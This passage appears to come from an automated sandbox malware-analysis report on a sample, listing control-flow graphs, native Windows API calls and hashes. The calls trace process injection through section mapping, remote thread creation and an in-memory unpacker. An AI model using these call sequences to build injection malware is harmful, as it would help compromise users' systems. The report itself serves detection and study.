                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2142258375.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_cOm0MmeV34.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectView
                                                            • String ID:
                                                            • API String ID: 1652636561-0
                                                            • Opcode ID: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
                                                            • Instruction ID: 6a824664258ffec6fdf95c516407446232c8a84219ad61b9fd4b8efeb52f3576
                                                            • Opcode Fuzzy Hash: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
                                                            • Instruction Fuzzy Hash: 9B615C75900245BFEB219F91CC88FEBBBB8FF85710F10016AF951BA2A5E7749901CB24
                                                            Function 00401543 Relevance: 10.7, APIs: 7, Instructions: 173nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 296 401543-401544 297 401546-401567 296->297 298 4015af-4015b1 296->298 306 401558-401563 297->306 307 40156a-401590 call 4011b7 297->307 300 4018b6-4018c5 298->300 301 4015b7-4015e0 298->301 304 4018da 300->304 305 4018cb-4018d6 300->305 301->300 316 4015e6-4015fd NtDuplicateObject 301->316 304->305 310 4018dd-401915 call 4011b7 304->310 305->310 306->307 325 401592 307->325 326 401595-40159a 307->326 316->300 319 401603-401627 NtCreateSection 316->319 322 401683-4016a9 NtCreateSection 319->322 323 401629-40164a NtMapViewOfSection 319->323 322->300 329 4016af-4016b3 322->329 323->322 327 40164c-401668 NtMapViewOfSection 323->327 325->326 338 4015a0-4015ad 326->338 339 4018b8-4018c0 326->339 327->322 330 40166a-401680 327->330 329->300 332 4016b9-4016da NtMapViewOfSection 329->332 330->322 332->300 335 4016e0-4016fc NtMapViewOfSection 332->335 335->300 340 401702 call 401707 335->340 338->298 339->326
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2142258375.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_cOm0MmeV34.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
                                                            • Instruction ID: 1fc6fb52bb36dddf8f971a96ecfe927bdbae9887f6286775c14151e9c1d92244
                                                            • Opcode Fuzzy Hash: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
                                                            • Instruction Fuzzy Hash: 13512B71900245BBEB209F91CC88FAF7BB8EF85B00F14416AF912BA2E5D6749945CB64
                                                            Function 00401565 Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 344 401565-401590 call 4011b7 349 401592 344->349 350 401595-40159a 344->350 349->350 352 4015a0-4015b1 350->352 353 4018b8-4018c0 350->353 357 4018b6-4018c5 352->357 358 4015b7-4015e0 352->358 353->350 360 4018da 357->360 361 4018cb-4018d6 357->361 358->357 366 4015e6-4015fd NtDuplicateObject 358->366 360->361 363 4018dd-401915 call 4011b7 360->363 361->363 366->357 368 401603-401627 NtCreateSection 366->368 370 401683-4016a9 NtCreateSection 368->370 371 401629-40164a NtMapViewOfSection 368->371 370->357 375 4016af-4016b3 370->375 371->370 373 40164c-401668 NtMapViewOfSection 371->373 373->370 376 40166a-401680 373->376 375->357 378 4016b9-4016da NtMapViewOfSection 375->378 376->370 378->357 380 4016e0-4016fc NtMapViewOfSection 378->380 380->357 383 401702 call 401707 380->383
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2142258375.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_cOm0MmeV34.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
                                                            • Instruction ID: d88667ffe02cbbb2798d41d5ad0cf6527765788d972b82ac88077c7d238bff09
                                                            • Opcode Fuzzy Hash: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
                                                            • Instruction Fuzzy Hash: 54511A71900205BFEF209F91CC89FAFBBB8FF85B10F104259F911AA2A5D7759941CB64
                                                            Function 00401579 Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 385 401579-401590 call 4011b7 391 401592 385->391 392 401595-40159a 385->392 391->392 394 4015a0-4015b1 392->394 395 4018b8-4018c0 392->395 399 4018b6-4018c5 394->399 400 4015b7-4015e0 394->400 395->392 402 4018da 399->402 403 4018cb-4018d6 399->403 400->399 408 4015e6-4015fd NtDuplicateObject 400->408 402->403 405 4018dd-401915 call 4011b7 402->405 403->405 408->399 410 401603-401627 NtCreateSection 408->410 412 401683-4016a9 NtCreateSection 410->412 413 401629-40164a NtMapViewOfSection 410->413 412->399 417 4016af-4016b3 412->417 413->412 415 40164c-401668 NtMapViewOfSection 413->415 415->412 418 40166a-401680 415->418 417->399 420 4016b9-4016da NtMapViewOfSection 417->420 418->412 420->399 422 4016e0-4016fc NtMapViewOfSection 420->422 422->399 425 401702 call 401707 422->425
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2142258375.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_cOm0MmeV34.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
                                                            • Instruction ID: 7169477154cf1621f4f222e223ad54e678f31395e99d0ffd613e12cb64d905d3
                                                            • Opcode Fuzzy Hash: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
                                                            • Instruction Fuzzy Hash: 2B511A75900245BBEF209F91CC88FEF7BB8FF85B10F104119F911BA2A5D6759941CB64
                                                            Function 0040157C Relevance: 10.7, APIs: 7, Instructions: 160nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 427 40157c-401590 call 4011b7 431 401592 427->431 432 401595-40159a 427->432 431->432 434 4015a0-4015b1 432->434 435 4018b8-4018c0 432->435 439 4018b6-4018c5 434->439 440 4015b7-4015e0 434->440 435->432 442 4018da 439->442 443 4018cb-4018d6 439->443 440->439 448 4015e6-4015fd NtDuplicateObject 440->448 442->443 445 4018dd-401915 call 4011b7 442->445 443->445 448->439 450 401603-401627 NtCreateSection 448->450 452 401683-4016a9 NtCreateSection 450->452 453 401629-40164a NtMapViewOfSection 450->453 452->439 457 4016af-4016b3 452->457 453->452 455 40164c-401668 NtMapViewOfSection 453->455 455->452 458 40166a-401680 455->458 457->439 460 4016b9-4016da NtMapViewOfSection 457->460 458->452 460->439 462 4016e0-4016fc NtMapViewOfSection 460->462 462->439 465 401702 call 401707 462->465
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2142258375.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_cOm0MmeV34.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
                                                            • Instruction ID: 14f4b29c405daff92d21e2b3eea283823ae405efc36948ac0d92101f557811aa
                                                            • Opcode Fuzzy Hash: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
                                                            • Instruction Fuzzy Hash: DE51F9B5900245BBEF209F91CC88FEFBBB8FF85B10F104259F911AA2A5D6709944CB64
                                                            Function 00402FE9 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 467 402fe9-40300d 468 403140-403145 467->468 469 403013-40302b 467->469 469->468 470 403031-403042 469->470 471 403044-40304d 470->471 472 403052-403060 471->472 472->472 473 403062-403069 472->473 474 40308b-403092 473->474 475 40306b-40308a 473->475 476 4030b4-4030b7 474->476 477 403094-4030b3 474->477 475->474 478 4030c0 476->478 479 4030b9-4030bc 476->479 477->476 478->471 480 4030c2-4030c7 478->480 479->478 481 4030be 479->481 480->468 482 4030c9-4030cc 480->482 481->480 482->468 483 4030ce-40313d RtlCreateUserThread NtTerminateProcess 482->483 483->468
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2142258375.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_cOm0MmeV34.jbxd
                                                            Similarity
                                                            • API ID: CreateProcessTerminateThreadUser
                                                            • String ID:
                                                            • API String ID: 1921587553-0
                                                            • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                            • Instruction ID: 3e1675bac70c022a4e457ffe6b5fa54937b73e0116388ba90aec32851b4d9964
                                                            • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                            • Instruction Fuzzy Hash: A1412431228E088FD768EF5CA885762B7D5F798311F6643AAE809D7389EA34DC1183C5
                                                            Function 02300326 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 484 2300326-230033f 485 2300341-2300343 484->485 486 2300345 485->486 487 230034a-2300356 CreateToolhelp32Snapshot 485->487 486->487 488 2300366-2300373 Module32First 487->488 489 2300358-230035e 487->489 490 2300375-2300376 call 22fffe5 488->490 491 230037c-2300384 488->491 489->488 496 2300360-2300364 489->496 494 230037b 490->494 494->491 496->485 496->488
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0230034E
                                                            • Module32First.KERNEL32(00000000,00000224), ref: 0230036E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2144344301.00000000022F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 022F9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_22f9000_cOm0MmeV34.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 3833638111-0
                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction ID: 7f0e52bdb90f65a814ad038c1053e0d7a6d75fe2793cd26bc206170207aabbdc
                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction Fuzzy Hash: 83F0F032200710AFD7213BF9A8DDB6FB6E8FF49724F100268E646D14C0DBB0E8458A71
                                                            Function 0220003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 220003c-2200047 1 2200049 0->1 2 220004c-2200263 call 2200a3f call 2200e0f call 2200d90 VirtualAlloc 0->2 1->2 17 2200265-2200289 call 2200a69 2->17 18 220028b-2200292 2->18 22 22002ce-22003c2 VirtualProtect call 2200cce call 2200ce7 17->22 19 22002a1-22002b0 18->19 21 22002b2-22002cc 19->21 19->22 21->19 29 22003d1-22003e0 22->29 30 22003e2-2200437 call 2200ce7 29->30 31 2200439-22004b8 VirtualFree 29->31 30->29 33 22005f4-22005fe 31->33 34 22004be-22004cd 31->34 35 2200604-220060d 33->35 36 220077f-2200789 33->36 38 22004d3-22004dd 34->38 35->36 42 2200613-2200637 35->42 40 22007a6-22007b0 36->40 41 220078b-22007a3 36->41 38->33 39 22004e3-2200505 38->39 51 2200517-2200520 39->51 52 2200507-2200515 39->52 44 22007b6-22007cb 40->44 45 220086e-22008be LoadLibraryA 40->45 41->40 46 220063e-2200648 42->46 48 22007d2-22007d5 44->48 50 22008c7-22008f9 45->50 46->36 49 220064e-220065a 46->49 53 2200824-2200833 48->53 54 22007d7-22007e0 48->54 49->36 55 2200660-220066a 49->55 56 2200902-220091d 50->56 57 22008fb-2200901 50->57 58 2200526-2200547 51->58 52->58 62 2200839-220083c 53->62 59 22007e2 54->59 60 22007e4-2200822 54->60 61 220067a-2200689 55->61 57->56 63 220054d-2200550 58->63 59->53 60->48 64 2200750-220077a 61->64 65 220068f-22006b2 61->65 62->45 66 220083e-2200847 62->66 68 22005e0-22005ef 63->68 69 2200556-220056b 63->69 64->46 70 22006b4-22006ed 65->70 71 22006ef-22006fc 65->71 72 2200849 66->72 73 220084b-220086c 66->73 68->38 74 220056d 69->74 75 220056f-220057a 69->75 70->71 76 220074b 71->76 77 22006fe-2200748 71->77 72->45 73->62 74->68 78 220059b-22005bb 75->78 79 220057c-2200599 75->79 76->61 77->76 84 22005bd-22005db 78->84 79->84 84->63
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0220024D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2143851890.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2200000_cOm0MmeV34.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID: cess$kernel32.dll
                                                            • API String ID: 4275171209-1230238691
                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction ID: c84998133a6f09befa8e4667c6b214795e7c43700411f50cb8d8da3717b06e4c
                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction Fuzzy Hash: B5526C74A11229DFDB64CF98C984BACBBB1BF09304F1480D9E54DAB356DB30AA85CF14
                                                            Function 02200E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 497 2200e0f-2200e24 SetErrorMode * 2 498 2200e26 497->498 499 2200e2b-2200e2c 497->499 498->499
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00000400,?,?,02200223,?,?), ref: 02200E19
                                                            • SetErrorMode.KERNELBASE(00000000,?,?,02200223,?,?), ref: 02200E1E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2143851890.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2200000_cOm0MmeV34.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction ID: be128ba4a1714c03969d69afea3e6d7d3813d5c654b19df80c39fee04ff0d183
                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction Fuzzy Hash: 97D0123115512877D7002AD4DC09BCD7B1CDF09B66F008011FB0DE9081C770964046E5
                                                            Function 00401918 Relevance: 1.3, APIs: 1, Instructions: 57sleepCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 592 401918-401943 597 401946-40197b call 4011b7 Sleep call 40143e 592->597 598 40193a-40193f 592->598 606 40198a-4019d3 call 4011b7 597->606 607 40197d-401985 call 401538 597->607 598->597 607->606
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401966
                                                              • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                              • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                              • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2142258375.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_cOm0MmeV34.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                            • String ID:
                                                            • API String ID: 1885482327-0
                                                            • Opcode ID: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
                                                            • Instruction ID: 41df8370e0b5f9a47a14a91e784646d83bdfa422f97ac69dcfec837627d5bcb0
                                                            • Opcode Fuzzy Hash: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
                                                            • Instruction Fuzzy Hash: 6D018CF520C148E7EB016A948DB1EBA36299B45324F300233B647B91F4C57C8A03E76F
                                                            Function 00401924 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 621 401924-401943 625 401946-40197b call 4011b7 Sleep call 40143e 621->625 626 40193a-40193f 621->626 634 40198a-4019d3 call 4011b7 625->634 635 40197d-401985 call 401538 625->635 626->625 635->634
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401966
                                                              • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                              • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                              • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2142258375.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_cOm0MmeV34.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                            • String ID:
                                                            • API String ID: 1885482327-0
                                                            • Opcode ID: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
                                                            • Instruction ID: 34fc3aff5e218d4630d956a4f9c4c41b7245144a44faa4fd8074b33eba8f9d72
                                                            • Opcode Fuzzy Hash: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
                                                            • Instruction Fuzzy Hash: 43017CF5208145E7EB015A948DB0EBA26299B45314F300237B617BA1F4C57D8602E76F
                                                            Function 022FFFE5 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02300036
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2144344301.00000000022F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 022F9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_22f9000_cOm0MmeV34.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                            • Instruction ID: 4aca9a86cce587b9342be278fcdc7debc2cce10057be9ac52a2f872787426406
                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                            • Instruction Fuzzy Hash: EC113C79A00208EFDB01DF98C985E99BBF5AF08350F0580A5F9489B3A1D775EA50DF90
                                                            Function 00401941 Relevance: 1.3, APIs: 1, Instructions: 44sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401966
                                                              • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                              • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                              • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2142258375.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_cOm0MmeV34.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                            • String ID:
                                                            • API String ID: 1885482327-0
                                                            • Opcode ID: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
                                                            • Instruction ID: 53d82b158b021bc4b6cde56962adc0b8c8d23177238c0d6ee964112a53f005ae
                                                            • Opcode Fuzzy Hash: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
                                                            • Instruction Fuzzy Hash: 38F0AFB6308249F7DB01AA908DB1EBA36299B54315F300633B617B91F5C57C8A12E76F
                                                            Function 00401954 Relevance: 1.3, APIs: 1, Instructions: 43sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401966
                                                              • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                              • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                              • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2142258375.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_cOm0MmeV34.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                            • String ID:
                                                            • API String ID: 1885482327-0
                                                            • Opcode ID: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
                                                            • Instruction ID: f7568a5a22988f4b084f7ac8228f9b89e575eda69d31bfffabc36cd9cbe45c64
                                                            • Opcode Fuzzy Hash: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
                                                            • Instruction Fuzzy Hash: BDF0C2B6208144F7DB019AA18DB1FBA36299B44314F300233BA17B90F5C67C8612E76F
                                                            Function 0040194C Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401966
                                                              • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                              • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                              • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2142258375.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_cOm0MmeV34.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                            • String ID:
                                                            • API String ID: 1885482327-0
                                                            • Opcode ID: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
                                                            • Instruction ID: 9d6088553fbd849a34ffa1589a5f9bffd683413c7e042594889390f4c4f3f426
                                                            • Opcode Fuzzy Hash: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
                                                            • Instruction Fuzzy Hash: 08F0C2B2208144F7DB019A958DA0FBA36299B44314F300633B617B91F5C57C8A02E72F

                                                            Non-executed Functions

                                                            Function 0220092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2143851890.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2200000_cOm0MmeV34.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .$GetProcAddress.$l
